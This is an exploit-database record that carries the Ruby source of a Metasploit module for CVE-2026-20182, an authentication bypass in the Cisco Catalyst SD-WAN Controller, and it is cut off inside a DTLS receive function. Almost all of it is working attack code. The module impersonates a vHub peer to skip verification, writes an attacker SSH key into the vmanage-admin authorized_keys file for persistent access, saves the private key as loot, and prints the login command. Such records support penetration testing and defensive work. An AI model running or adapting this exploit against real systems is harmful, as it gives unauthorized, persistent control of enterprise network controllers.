{“lastseen”:”2026-05-15T19:28:09″,”description”:”This module exploits an authentication bypass vulnerability CVE-2026-20182 in the Cisco Catalyst SD-WAN Controller. The vdaemon DTLS control-plane service performs no certificate or credential verification for connecting peers that claim to be a vHub…”,”published”:”2026-05-15T19:01:42″,”modified”:”2026-05-15T19:01:42″,”type”:”metasploit”,”title”:”Cisco Catalyst SD-WAN Controller vHub Authentication Bypass”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-ADMIN-NETWORKING-CISCO_SDWAN_VHUB_AUTH_BYPASS-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-20182″],”sourceData”:”# frozen_string_literal: true\\n\\n##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire ‘fiddle’\\nrequire ‘ipaddr’\\nrequire ‘base64’\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::Udp\\n include Msf::Auxiliary::Report\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Cisco Catalyst SD-WAN Controller vHub Authentication Bypass’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an authentication bypass vulnerability (CVE-2026-20182)\\n in the Cisco Catalyst SD-WAN Controller. The vdaemon DTLS control-plane\\n service performs no certificate or credential verification for connecting peers\\n that claim to be a vHub (device type 2). The vbond_proc_challenge_ack() function\\n implements device-type-specific verification through a series of conditional\\n blocks, but contains no code path for device type 2 (vHub). After a DTLS\\n handshake using any self-signed certificate, an attacker sends a CHALLENGE_ACK\\n (msg_type=9) with the vHub device type encoded in the protocol header. The\\n function falls through all verification checks and unconditionally sets\\n peer-\\u003eauthenticated = 1.\\n\\n This module leverages the authentication bypass to inject an attacker-controlled\\n SSH public key into the vmanage-admin user’s authorized_keys file via a\\n VMANAGE_TO_PEER message (msg_type=14), providing persistent SSH access to the\\n controller over the NETCONF service (TCP port 830).\\n\\n Affected versions: Cisco Catalyst SD-WAN Controller 20.12.6.1 and earlier.\\n Consult Cisco’s security advisory for a complete list of affected versions\\n and patches.\\n },\\n ‘Author’ =\\u003e [\\n ‘sfewer-r7’, # Vulnerability discovery\\n ‘Crypto-Cat’, # Vulnerability discovery and Metasploit module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-20182’],\\n [‘URL’, ‘https:\/\/sec.cloudapps.cisco.com\/security\/center\/content\/CiscoSecurityAdvisory\/cisco-sa-sdwan-rpa2-v69WY2SW’], # Vendor advisory\\n [‘URL’, ‘https:\/\/blog.talosintelligence.com\/sd-wan-ongoing-exploitation\/’], # Talos blog\\n [‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed\/’] # Rapid7 blog\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-05-07’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n Opt::RPORT(12346),\\n OptInt.new(‘DOMAIN_ID’, [true, ‘SD-WAN domain ID’, 1]),\\n OptInt.new(‘SITE_ID’, [true, ‘SD-WAN site ID’, 100]),\\n OptPath.new(‘SSH_PUBLIC_KEY_FILE’, [false, ‘Path to an existing SSH public key file to inject’])\\n ]\\n )\\n end\\n\\n def check\\n result = perform_auth_bypass(ssh_key_inject: false, silent: !datastore[‘VERBOSE’])\\n if result == :vulnerable\\n Msf::Exploit::CheckCode::Vulnerable(‘Authentication bypass succeeded – vHub CHALLENGE_ACK accepted without verification’)\\n elsif result == :detected\\n Msf::Exploit::CheckCode::Detected(‘DTLS service detected but bypass could not be confirmed’)\\n else\\n Msf::Exploit::CheckCode::Unknown(‘Could not determine vulnerability status’)\\n end\\n rescue ::StandardError =\\u003e e\\n vprint_error(\\”Check failed: #{e.message}\\”)\\n Msf::Exploit::CheckCode::Unknown(\\”Check failed: #{e.message}\\”)\\n end\\n\\n def run\\n result = perform_auth_bypass(ssh_key_inject: true, silent: false)\\n if result == :vulnerable\\n report_vuln(\\n host: rhost,\\n port: rport,\\n proto: ‘udp’,\\n name: name,\\n info: ‘Authentication bypass confirmed – vHub CHALLENGE_ACK accepted without verification’,\\n refs: references\\n )\\n print_good(‘Authentication bypass and SSH key injection completed!’)\\n else\\n fail_with(Failure::UnexpectedReply, ‘Exploit failed’)\\n end\\n end\\n\\n private\\n\\n def perform_auth_bypass(ssh_key_inject:, silent: false)\\n ssl = nil\\n ctx = nil\\n udp_sock = nil\\n\\n begin\\n # Phase 1: DTLS handshake\\n ssl, ctx, udp_sock, rbio, wbio = phase1_dtls_handshake(silent: silent)\\n return :safe unless ssl\\n\\n # Phase 2: Receive CHALLENGE\\n return :detected unless phase2_receive_challenge(ssl, rbio, wbio, udp_sock, silent: silent)\\n\\n # Phase 3: Send CHALLENGE_ACK (the bypass)\\n return :detected unless phase3_send_challenge_ack(ssl, rbio, wbio, udp_sock, silent: silent)\\n\\n # Phase 4: Observe result\\n return :detected unless phase4_observe_result(ssl, rbio, wbio, udp_sock, silent: silent)\\n\\n # Phase 5: Send Hello\\n return :detected unless phase5_send_hello(ssl, rbio, wbio, udp_sock, silent: silent)\\n\\n # Phase 6: SSH key injection\\n phase6_ssh_key_inject(ssl, rbio, wbio, udp_sock, silent: silent) if ssh_key_inject\\n\\n :vulnerable\\n ensure\\n cleanup_dtls(ssl, ctx, udp_sock)\\n end\\n end\\n\\n def phase1_dtls_handshake(silent: false)\\n print_status(‘Phase 1: DTLS handshake with self-signed certificate’) unless silent\\n\\n load_openssl_ffi\\n\\n # Generate self-signed certificate (in-memory, no files written to disk)\\n cert_der, key_der = generate_self_signed_cert\\n\\n # Create UDP socket\\n udp_sock = Rex::Socket::Udp.create(\\n ‘PeerHost’ =\\u003e rhost,\\n ‘PeerPort’ =\\u003e rport,\\n ‘Context’ =\\u003e { ‘Msf’ =\\u003e framework, ‘MsfExploit’ =\\u003e self }\\n )\\n\\n # Create DTLS context\\n method_ptr = @f_dtls_client_method.call\\n fail_with(Failure::Unknown, ‘DTLS_client_method() returned NULL’) if method_ptr.null?\\n\\n ctx = @f_ssl_ctx_new.call(method_ptr)\\n fail_with(Failure::Unknown, ‘SSL_CTX_new() returned NULL’) if ctx.null?\\n\\n # Disable peer certificate verification\\n @f_ssl_ctx_set_verify.call(ctx, SSL_VERIFY_NONE, Fiddle::NULL)\\n\\n # Load certificate and key from in-memory DER data\\n ret = @f_ssl_ctx_use_certificate_asn1.call(ctx, cert_der.bytesize, cert_der)\\n fail_with(Failure::Unknown, \\”SSL_CTX_use_certificate_ASN1 failed (ret=#{ret})\\”) unless ret == 1\\n\\n ret = @f_ssl_ctx_use_privatekey_asn1.call(EVP_PKEY_RSA, ctx, key_der, key_der.bytesize)\\n fail_with(Failure::Unknown, \\”SSL_CTX_use_PrivateKey_ASN1 failed (ret=#{ret})\\”) unless ret == 1\\n\\n # Create SSL object\\n ssl = @f_ssl_new.call(ctx)\\n fail_with(Failure::Unknown, ‘SSL_new() returned NULL’) if ssl.null?\\n\\n # Create memory BIOs\\n mem_method = @f_bio_s_mem.call\\n rbio = @f_bio_new.call(mem_method)\\n wbio = @f_bio_new.call(mem_method)\\n fail_with(Failure::Unknown, ‘BIO_new() returned NULL’) if rbio.null? || wbio.null?\\n\\n # Attach BIOs to SSL (SSL takes ownership)\\n @f_ssl_set_bio.call(ssl, rbio, wbio)\\n\\n # Perform DTLS handshake\\n do_dtls_handshake(ssl, rbio, wbio, udp_sock)\\n\\n print_status(‘DTLS handshake succeeded (self-signed cert accepted)’) unless silent\\n\\n [ssl, ctx, udp_sock, rbio, wbio]\\n rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED =\\u003e e\\n print_error(\\”Connection failed: #{e.message}\\”) unless silent\\n cleanup_dtls(ssl, ctx, udp_sock)\\n [nil, nil, nil, nil, nil]\\n rescue Fiddle::DLError =\\u003e e\\n print_error(\\”OpenSSL FFI error: #{e.message}\\”) unless silent\\n cleanup_dtls(ssl, ctx, udp_sock)\\n [nil, nil, nil, nil, nil]\\n end\\n\\n def phase2_receive_challenge(ssl, rbio, wbio, udp_sock, silent: false)\\n print_status(‘Phase 2: Waiting for CHALLENGE from server’) unless silent\\n\\n hdr, body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 15)\\n unless hdr\\n print_error(‘No CHALLENGE received from server’) unless silent\\n return false\\n end\\n\\n if hdr_msg_type(hdr) != MSG_CHALLENGE\\n print_error(\\”Expected CHALLENGE (type=#{MSG_CHALLENGE}), got #{msg_name(hdr_msg_type(hdr))} (type=#{hdr_msg_type(hdr)})\\”) unless silent\\n return false\\n end\\n\\n print_status(\\”CHALLENGE received (#{body.bytesize} bytes of challenge data)\\”) unless silent\\n true\\n end\\n\\n def phase3_send_challenge_ack(ssl, _rbio, wbio, udp_sock, silent: false)\\n print_status(‘Phase 3: Sending CHALLENGE_ACK as vHub (authentication bypass)’) unless silent\\n\\n ack_body = build_challenge_ack_body\\n send_message(ssl, wbio, udp_sock, MSG_CHALLENGE_ACK, ack_body)\\n\\n true\\n end\\n\\n def phase4_observe_result(ssl, rbio, wbio, udp_sock, silent: false)\\n print_status(‘Phase 4: Waiting for server response to CHALLENGE_ACK’) unless silent\\n\\n hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 10)\\n if hdr\\n mtype = hdr_msg_type(hdr)\\n if mtype == MSG_TEAR_DOWN\\n print_warning(‘TEAR_DOWN received – server rejected the CHALLENGE_ACK’) unless silent\\n return false\\n end\\n print_status(\\”Server responded with: #{msg_name(mtype)}\\”) unless silent\\n else\\n print_warning(‘No immediate response (server may be waiting for our Hello)’) unless silent\\n end\\n\\n true\\n end\\n\\n def phase5_send_hello(ssl, rbio, wbio, udp_sock, silent: false)\\n print_status(‘Phase 5: Sending Hello as authenticated peer’) unless silent\\n\\n hello_body = build_hello_body\\n send_message(ssl, wbio, udp_sock, MSG_HELLO, hello_body)\\n\\n hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 10)\\n if hdr\\n mtype = hdr_msg_type(hdr)\\n if mtype == MSG_HELLO\\n print_good(‘Hello response received – authenticated as vHub peer’) unless silent\\n return true\\n elsif mtype == MSG_TEAR_DOWN\\n print_warning(‘TEAR_DOWN received after Hello’) unless silent\\n else\\n print_warning(\\”Server responded with: #{msg_name(mtype)}\\”) unless silent\\n end\\n else\\n print_warning(‘No Hello response’) unless silent\\n end\\n\\n false\\n end\\n\\n def phase6_ssh_key_inject(ssl, rbio, wbio, udp_sock, silent: false)\\n print_status(‘Phase 6: Injecting SSH public key into vmanage-admin authorized_keys’) unless silent\\n\\n ssh_pubkey, ssh_privkey_pem = resolve_ssh_key(silent: silent)\\n\\n # Build SSH key injection body (769 bytes)\\n key_body = build_ssh_inject_body(ssh_pubkey)\\n\\n send_message(ssl, wbio, udp_sock, MSG_VMANAGE_TO_PEER, key_body)\\n\\n if datastore[‘SSH_PUBLIC_KEY_FILE’]\\n # If we are using an existing key supplied by the user, just show how to connect to the NETCONF service.\\n print_good(\\”Use: ssh -i \\u003cSSH_PRIVATE_KEY_FILE\\u003e vmanage-admin@#{rhost} -p 830\\”) unless silent\\n else\\n # Write SSH key file to loot\\n privkey_path = store_loot(\\n ‘cisco.sdwan.sshkey’,\\n ‘application\/x-pem-file’,\\n rhost,\\n ssh_privkey_pem,\\n ‘sdwan_ssh_key.pem’,\\n ‘SSH private key for vmanage-admin access’\\n )\\n ::File.chmod(0o600, privkey_path)\\n\\n unless silent\\n print_status(\\”SSH private key saved to loot: #{privkey_path}\\”)\\n # Provide connection instructions\\n print_good(‘Connect to NETCONF via:’)\\n print_line(\\”ssh -i #{privkey_path} vmanage-admin@#{rhost} -p 830\\”)\\n end\\n end\\n\\n # Check for response\\n hdr, _body = recv_message(ssl, rbio, wbio, udp_sock, timeout: 5)\\n if hdr\\n mtype = hdr_msg_type(hdr)\\n if mtype == MSG_REGISTER_TO_VMANAGE\\n print_status(‘Server responded with: REGISTER_TO_VMANAGE (key has been injected)’) unless silent\\n else\\n print_warning(\\”Server responded with: #{msg_name(mtype)}\\”) unless silent\\n end\\n else\\n print_warning(‘No response to key injection’) unless silent\\n end\\n end\\n\\n #\\n # vdaemon protocol constants\\n #\\n\\n MSG_HELLO = 0x05\\n MSG_CHALLENGE = 0x08\\n MSG_CHALLENGE_ACK = 0x09\\n MSG_TEAR_DOWN = 0x0B\\n MSG_REGISTER_TO_VMANAGE = 0x0D\\n MSG_VMANAGE_TO_PEER = 0x0E\\n\\n # Device type encoded in the upper nibble of header byte 1.\\n # Claiming vHub (type 2) causes vbond_proc_challenge_ack() to fall through\\n # all verification branches and unconditionally set peer-\\u003eauthenticated = 1.\\n DEV_VHUB = 2\\n\\n HDR_FLAGS = 0xA0\\n\\n TLV_UUID = 0x0006\\n TLV_INSTANCE_ID = 0x0013\\n TLV_MAX_INSTANCES = 0x0014\\n TLV_FLAG_18 = 0x0018\\n TLV_FLAG_19 = 0x0019\\n TLV_SERVER_KEY = 0x0032\\n TLV_NUM_VSMARTS = 0x0021\\n TLV_NUM_VMANAGES = 0x0022\\n\\n MSG_NAMES = {\\n 0 =\\u003e ‘NEW_CHALLENGE_ACK’,\\n 1 =\\u003e ‘Register’,\\n 5 =\\u003e ‘Hello’,\\n 7 =\\u003e ‘Data’,\\n 8 =\\u003e ‘CHALLENGE’,\\n 9 =\\u003e ‘CHALLENGE_ACK’,\\n 10 =\\u003e ‘CHALLENGE_ACK_ACK’,\\n 11 =\\u003e ‘TEAR_DOWN’,\\n 12 =\\u003e ‘DELETE_VSMARTS_SERIAL’,\\n 13 =\\u003e ‘REGISTER_TO_VMANAGE’,\\n 14 =\\u003e ‘VMANAGE_TO_PEER’,\\n 15 =\\u003e ‘submsg’\\n }.freeze\\n\\n #\\n # Protocol encoding\/decoding\\n #\\n\\n def build_header(msg_type)\\n byte0 = msg_type \\u0026 0x0F\\n byte1 = (DEV_VHUB \\u0026 0x0F) \\u003c\\u003c 4\\n domain_id = datastore[‘DOMAIN_ID’]\\n site_id = datastore[‘SITE_ID’]\\n [byte0, byte1, HDR_FLAGS, 0x00, domain_id, site_id].pack(‘CCCCN2’)\\n end\\n\\n def hdr_msg_type(hdr_bytes)\\n hdr_bytes.getbyte(0) \\u0026 0x0F\\n end\\n\\n def msg_name(type)\\n MSG_NAMES.fetch(type) { format(‘Unknown(0x%02X)’, type) }\\n end\\n\\n def send_message(ssl, wbio, udp_sock, msg_type, body = ”.b)\\n header = build_header(msg_type)\\n message = header + body\\n vprint_status(\\”Sending #{msg_name(msg_type)} (#{message.bytesize} bytes)\\”)\\n dtls_send(ssl, wbio, udp_sock, message)\\n end\\n\\n def recv_message(ssl, rbio, wbio, udp_sock, timeout: 10)\\n data = dtls_recv(ssl, rbio, wbio, udp_sock, timeout: timeout)\\n return [nil, nil] unless data\\n return [nil, nil] if data.bytesize \\u003c 12\\n\\n hdr = data[0, 12]\\n body = data[12..] || ”.b\\n mtype = hdr_msg_type(hdr)\\n vprint_status(\\”Received #{msg_name(mtype)} (#{data.bytesize} bytes)\\”)\\n [hdr, body]\\n end\\n\\n #\\n # Message body builders\\n #\\n\\n def build_challenge_ack_body\\n uuid = format(\\n ‘%\\u003ca\\u003e08x-%\\u003cb\\u003e04x-%\\u003cc\\u003e04x-%\\u003cd\\u003e04x-%\\u003ce\\u003e012x’,\\n a: rand(0xffffffff), b: rand(0xffff), c: rand(0xffff),\\n d: rand(0xffff), e: rand(0xffffffffffff)\\n )\\n server_key = Rex::Text.rand_text_alphanumeric(32)\\n\\n tlvs = [\\n build_tlv(TLV_INSTANCE_ID, [0].pack(‘n’)),\\n build_tlv(TLV_MAX_INSTANCES, [1].pack(‘n’)),\\n build_tlv(TLV_FLAG_18, [1].pack(‘C’)),\\n build_tlv(TLV_FLAG_19, [0].pack(‘C’)),\\n build_tlv(TLV_UUID, uuid),\\n build_tlv(TLV_SERVER_KEY, server_key)\\n ]\\n\\n buf = [0, 0].pack(‘CC’) # verified_status=0, hardware_flag=0\\n buf \\u003c\\u003c [tlvs.size].pack(‘C’)\\n buf \\u003c\\u003c tlvs.join\\n buf\\n end\\n\\n def build_hello_body\\n buf = ”.b\\n\\n buf \\u003c\\u003c [0x00, 0x00, 0x00, 0x00].pack(‘CCCC’) # preamble, is_dummy=false\\n buf \\u003c\\u003c [0x0002].pack(‘n’) # address family: AF_INET\\n buf \\u003c\\u003c IPAddr.new(rhost, Socket::AF_INET).hton # IP address\\n buf \\u003c\\u003c [rport].pack(‘n’) # port\\n buf \\u003c\\u003c [1].pack(‘N’) # color\\n buf \\u003c\\u003c (\\”\\\\x00\\” * 20) # label\/key padding\\n\\n buf \\u003c\\u003c [10_000, 60_000].pack(‘N2’) # hello_interval_ms, hello_tolerance_ms\\n\\n tlv_vsmarts = build_tlv(TLV_NUM_VSMARTS, [0x00].pack(‘C’))\\n tlv_vmanages = build_tlv(TLV_NUM_VMANAGES, [0x00].pack(‘C’))\\n buf \\u003c\\u003c [2].pack(‘C’)\\n buf \\u003c\\u003c tlv_vsmarts\\n buf \\u003c\\u003c tlv_vmanages\\n\\n buf\\n end\\n\\n def build_tlv(type, value)\\n [type, value.bytesize].pack(‘n2’) + value.b\\n end\\n\\n def build_ssh_inject_body(ssh_pubkey)\\n # Leading newline ensures key appends cleanly regardless of whether\\n # authorized_keys ends with a newline. Trailing newline for consistency.\\n key_buf = \\”\\\\n\\”.b + ssh_pubkey.b\\n key_buf \\u003c\\u003c \\”\\\\n\\”.b unless key_buf.end_with?(\\”\\\\n\\”.b)\\n key_buf \\u003c\\u003c \\”\\\\x00\\”.b # null-terminate for fputs()\\n key_buf \\u003c\\u003c (\\”\\\\x00\\”.b * (768 – key_buf.bytesize)) if key_buf.bytesize \\u003c 768\\n key_buf \\u003c\\u003c [0].pack(‘C’) # TLV count = 0\\n key_buf\\n end\\n\\n #\\n # Certificate and SSH key helpers\\n #\\n\\n def generate_self_signed_cert\\n key = OpenSSL::PKey::RSA.new(2048)\\n cert = OpenSSL::X509::Certificate.new\\n\\n cert.version = 2\\n cert.serial = rand(1..0xFFFFFFFF)\\n cert.subject = OpenSSL::X509::Name.parse(‘\/CN=\/O=\/C=’)\\n cert.issuer = cert.subject\\n cert.public_key = key\\n cert.not_before = Time.now – 60\\n cert.not_after = Time.now + (365 * 86_400)\\n\\n cert.sign(key, OpenSSL::Digest.new(‘SHA256’))\\n\\n [cert.to_der, key.to_der]\\n end\\n\\n def resolve_ssh_key(silent: false)\\n if datastore[‘SSH_PUBLIC_KEY_FILE’]\\n pubkey = File.read(datastore[‘SSH_PUBLIC_KEY_FILE’]).strip\\n print_status(\\”Using SSH public key from #{datastore[‘SSH_PUBLIC_KEY_FILE’]}\\”) unless silent\\n return [pubkey, nil]\\n end\\n\\n # Generate new RSA keypair\\n print_status(‘Generating RSA 2048-bit SSH keypair’) unless silent\\n key = OpenSSL::PKey::RSA.new(2048)\\n\\n pubkey_str = build_openssh_pubkey(key)\\n privkey_pem = key.to_pem\\n\\n [pubkey_str, privkey_pem]\\n end\\n\\n def build_openssh_pubkey(key)\\n e_bytes = bn_to_bytes(key.e)\\n n_bytes = bn_to_bytes(key.n)\\n\\n # Prepend 0x00 if MSB is set (two’s complement sign bit)\\n e_bytes = \\”\\\\x00\\”.b + e_bytes if e_bytes.getbyte(0) \\u0026 0x80 != 0\\n n_bytes = \\”\\\\x00\\”.b + n_bytes if n_bytes.getbyte(0) \\u0026 0x80 != 0\\n\\n blob = ssh_string(‘ssh-rsa’) + ssh_string(e_bytes) + ssh_string(n_bytes)\\n \\”ssh-rsa #{Base64.strict_encode64(blob)}\\”\\n end\\n\\n def ssh_string(data)\\n data = data.b if data.respond_to?(:b)\\n [data.bytesize].pack(‘N’) + data\\n end\\n\\n def bn_to_bytes(bn)\\n hex = bn.to_s(16)\\n hex = \\”0#{hex}\\” if hex.length.odd?\\n [hex].pack(‘H*’)\\n end\\n\\n #\\n # DTLS transport via Fiddle (OpenSSL C API)\\n #\\n # Ruby’s OpenSSL bindings do not support DTLS. We use Fiddle to call the\\n # OpenSSL C API directly with memory BIOs to drive the DTLS 1.2 handshake.\\n #\\n\\n # OpenSSL constants for Fiddle FFI\\n SSL_VERIFY_NONE = 0\\n EVP_PKEY_RSA = 6\\n SSL_ERROR_WANT_READ = 2\\n SSL_ERROR_WANT_WRITE = 3\\n SSL_ERROR_ZERO_RETURN = 6\\n BIO_CTRL_PENDING = 10\\n DTLS_CTRL_HANDLE_TIMEOUT = 106\\n\\n HANDSHAKE_TIMEOUT = 5\\n MAX_HANDSHAKE_RETRIES = 10\\n RECV_BUF_SIZE = 65_536\\n\\n def load_openssl_ffi\\n return if @ffi_loaded\\n\\n libssl = load_native_lib(‘ssl’)\\n libcrypto = load_native_lib(‘crypto’)\\n\\n # libssl functions\\n @f_dtls_client_method = bind_function(libssl, ‘DTLS_client_method’, [], Fiddle::TYPE_VOIDP)\\n @f_ssl_ctx_new = bind_function(libssl, ‘SSL_CTX_new’, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOIDP)\\n @f_ssl_ctx_set_verify = bind_function(libssl, ‘SSL_CTX_set_verify’, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)\\n @f_ssl_ctx_use_certificate_asn1 = bind_function(libssl, ‘SSL_CTX_use_certificate_ASN1’, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT)\\n @f_ssl_ctx_use_privatekey_asn1 = bind_function(libssl, ‘SSL_CTX_use_PrivateKey_ASN1’, [Fiddle::TYPE_INT, Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_LONG], Fiddle::TYPE_INT)\\n @f_ssl_new = bind_function(libssl, ‘SSL_new’, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOIDP)\\n @f_ssl_set_bio = bind_function(libssl, ‘SSL_set_bio’, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)\\n @f_ssl_connect = bind_function(libssl, ‘SSL_connect’, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT)\\n @f_ssl_read = bind_function(libssl, ‘SSL_read’, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)\\n @f_ssl_write = bind_function(libssl, ‘SSL_write’, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)\\n @f_ssl_get_error = bind_function(libssl, ‘SSL_get_error’, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)\\n @f_ssl_free = bind_function(libssl, ‘SSL_free’, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)\\n @f_ssl_ctx_free = bind_function(libssl, ‘SSL_CTX_free’, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOID)\\n @f_ssl_ctrl = bind_function(libssl, ‘SSL_ctrl’, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_LONG, Fiddle::TYPE_VOIDP], Fiddle::TYPE_LONG)\\n\\n # libcrypto functions\\n @f_bio_new = bind_function(libcrypto, ‘BIO_new’, [Fiddle::TYPE_VOIDP], Fiddle::TYPE_VOIDP)\\n @f_bio_s_mem = bind_function(libcrypto, ‘BIO_s_mem’, [], Fiddle::TYPE_VOIDP)\\n @f_bio_read = bind_function(libcrypto, ‘BIO_read’, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)\\n @f_bio_write = bind_function(libcrypto, ‘BIO_write’, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT], Fiddle::TYPE_INT)\\n @f_bio_ctrl = bind_function(libcrypto, ‘BIO_ctrl’, [Fiddle::TYPE_VOIDP, Fiddle::TYPE_INT, Fiddle::TYPE_LONG, Fiddle::TYPE_VOIDP], Fiddle::TYPE_LONG)\\n @f_err_clear_error = bind_function(libcrypto, ‘ERR_clear_error’, [], Fiddle::TYPE_VOID)\\n @f_err_get_error = bind_function(libcrypto, ‘ERR_get_error’, [], Fiddle::TYPE_LONG)\\n @f_err_error_string_n = bind_function(libcrypto, ‘ERR_error_string_n’, [Fiddle::TYPE_LONG, Fiddle::TYPE_VOIDP, Fiddle::TYPE_SIZE_T], Fiddle::TYPE_VOID)\\n\\n @recv_buf = Fiddle::Pointer.malloc(RECV_BUF_SIZE, Fiddle::RUBY_FREE)\\n @ffi_loaded = true\\n\\n vprint_status(‘OpenSSL FFI bindings loaded successfully’)\\n end\\n\\n def load_native_lib(name)\\n candidates = case RUBY_PLATFORM\\n when \/mingw|mswin|cygwin\/\\n bin = RbConfig::CONFIG[‘bindir’]\\n arch_dir = RbConfig::CONFIG[‘archdir’]\\n site_arch = RbConfig::CONFIG[‘sitearchdir’]\\n paths = []\\n [arch_dir, site_arch, bin].compact.uniq.each do |dir|\\n paths \\u003c\\u003c \\”#{dir}\/lib#{name}-3-x64.dll\\”\\n paths \\u003c\\u003c \\”#{dir}\/lib#{name}-3.dll\\”\\n paths \\u003c\\u003c \\”#{dir}\/lib#{name}-1_1-x64.dll\\”\\n end\\n paths += %W[lib#{name}-3-x64 lib#{name}-3 lib#{name}]\\n paths\\n when \/darwin\/\\n %W[\\n \/usr\/local\/opt\/openssl@3\/lib\/lib#{name}.3.dylib\\n \/usr\/local\/opt\/openssl\/lib\/lib#{name}.dylib\\n \/opt\/homebrew\/opt\/openssl@3\/lib\/lib#{name}.3.dylib\\n \/opt\/homebrew\/opt\/openssl\/lib\/lib#{name}.dylib\\n \/opt\/local\/lib\/lib#{name}.3.dylib\\n \/opt\/local\/lib\/lib#{name}.dylib\\n ]\\n else\\n %W[\\n lib#{name}.so.3\\n lib#{name}.so.1.1\\n lib#{name}.so\\n ]\\n end\\n\\n candidates.each do |path|\\n next if path.start_with?(‘\/’) \\u0026\\u0026 !File.exist?(path)\\n\\n return Fiddle.dlopen(path)\\n rescue Fiddle::DLError\\n next\\n end\\n fail_with(Failure::NotFound, \\”Cannot find lib#{name}. Ensure OpenSSL is installed.\\”)\\n end\\n\\n def bind_function(lib, name, args, ret)\\n Fiddle::Function.new(lib[name], args, ret)\\n end\\n\\n def bio_ctrl_pending(bio)\\n @f_bio_ctrl.call(bio, BIO_CTRL_PENDING, 0, Fiddle::NULL)\\n end\\n\\n def handle_dtls_timeout(ssl)\\n @f_ssl_ctrl.call(ssl, DTLS_CTRL_HANDLE_TIMEOUT, 0, Fiddle::NULL)\\n end\\n\\n def drain_openssl_errors\\n msgs = []\\n loop do\\n code = @f_err_get_error.call\\n break if code == 0\\n\\n buf = Fiddle::Pointer.malloc(256, Fiddle::RUBY_FREE)\\n @f_err_error_string_n.call(code, buf, 256)\\n msgs \\u003c\\u003c buf.to_s\\n end\\n msgs\\n end\\n\\n # Drive the DTLS handshake state machine, shuttling data between the\\n # SSL engine and the UDP socket via memory BIOs.\\n def do_dtls_handshake(ssl, rbio, wbio, udp_sock)\\n retries = 0\\n\\n loop do\\n @f_err_clear_error.call\\n ret = @f_ssl_connect.call(ssl)\\n flush_wbio(wbio, udp_sock)\\n\\n break if ret == 1\\n\\n err = @f_ssl_get_error.call(ssl, ret)\\n case err\\n when SSL_ERROR_WANT_READ\\n ready = ::IO.select([udp_sock], nil, nil, HANDSHAKE_TIMEOUT)\\n if ready\\n begin\\n dgram = udp_sock.recvfrom(65_536)[0]\\n @f_bio_write.call(rbio, dgram, dgram.bytesize)\\n rescue ::IO::WaitReadable\\n retries += 1\\n fail_with(Failure::Unreachable, \\”DTLS handshake timeout after #{retries} retries\\”) if retries \\u003e MAX_HANDSHAKE_RETRIES\\n\\n handle_dtls_timeout(ssl)\\n flush_wbio(wbio, udp_sock)\\n end\\n else\\n retries += 1\\n fail_with(Failure::Unreachable, \\”DTLS handshake timeout after #{retries} retries\\”) if retries \\u003e MAX_HANDSHAKE_RETRIES\\n\\n handle_dtls_timeout(ssl)\\n flush_wbio(wbio, udp_sock)\\n end\\n when SSL_ERROR_WANT_WRITE\\n flush_wbio(wbio, udp_sock)\\n else\\n errors = drain_openssl_errors\\n fail_with(Failure::Unknown, \\”DTLS handshake failed (SSL error #{err}): #{errors.join(‘; ‘)}\\”)\\n end\\n end\\n end\\n\\n def flush_wbio(wbio, udp_sock)\\n loop do\\n pending = bio_ctrl_pending(wbio)\\n break if pending \\u003c= 0\\n\\n buf = Fiddle::Pointer.malloc(pending, Fiddle::RUBY_FREE)\\n n = @f_bio_read.call(wbio, buf, pending)\\n break if n \\u003c= 0\\n\\n udp_sock.write(buf.to_str(n))\\n end\\n end\\n\\n def dtls_send(ssl, wbio, udp_sock, data)\\n @f_err_clear_error.call\\n ret = @f_ssl_write.call(ssl, data, data.bytesize)\\n if ret \\u003c= 0\\n err = @f_ssl_get_error.call(ssl, ret)\\n errors = drain_openssl_errors\\n fail_with(Failure::Unknown, \\”SSL_write failed (error #{err}): #{errors.join(‘; ‘)}\\”)\\n end\\n flush_wbio(wbio, udp_sock)\\n ret\\n end\\n\\n def dtls_recv(ssl, rbio, _wbio, udp_sock, 